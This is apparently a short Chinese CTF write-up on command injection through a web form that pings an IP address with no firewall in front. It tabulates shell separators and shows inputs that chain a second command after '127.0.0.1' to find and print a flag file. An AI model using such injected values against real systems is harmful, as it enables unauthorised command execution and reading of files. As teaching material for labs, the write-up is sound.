
没有waf,即web应用可能会执行输入的恶意代码,进而造成命令执行漏洞
输入127.0.0.1,得到

这里先学习一下常见的连接符:
| ; | A;B | 先执行A,再执行B |
| & | A&B | 简单拼接,A B之间无制约关系 |
| | | A|B | 显示B的执行结果 |
| && | A&&B | A执行成功,然后才会执行B |
| || | A||B | A执行失败,然后才会执行B |
这里我们尝试
127.0.0.1 && find / -name "flag*"
# / 根目录开始找 -name "flag*" 查找含有flag的文件名 * 通配符

找到了flag.txt的路径,接下来输入cat查看
127.0.0.1 && cat /home/flag.txt #cat是查看命令

本文讨论了在没有Web应用防火墙(WAF)保护的情况下,如何通过恶意输入利用Web应用的连接符特性,实现命令执行漏洞,如使用`127.0.0.1`和`find`命令寻找并查看flag.txt文件的过程。

3941

被折叠的 条评论
为什么被折叠?



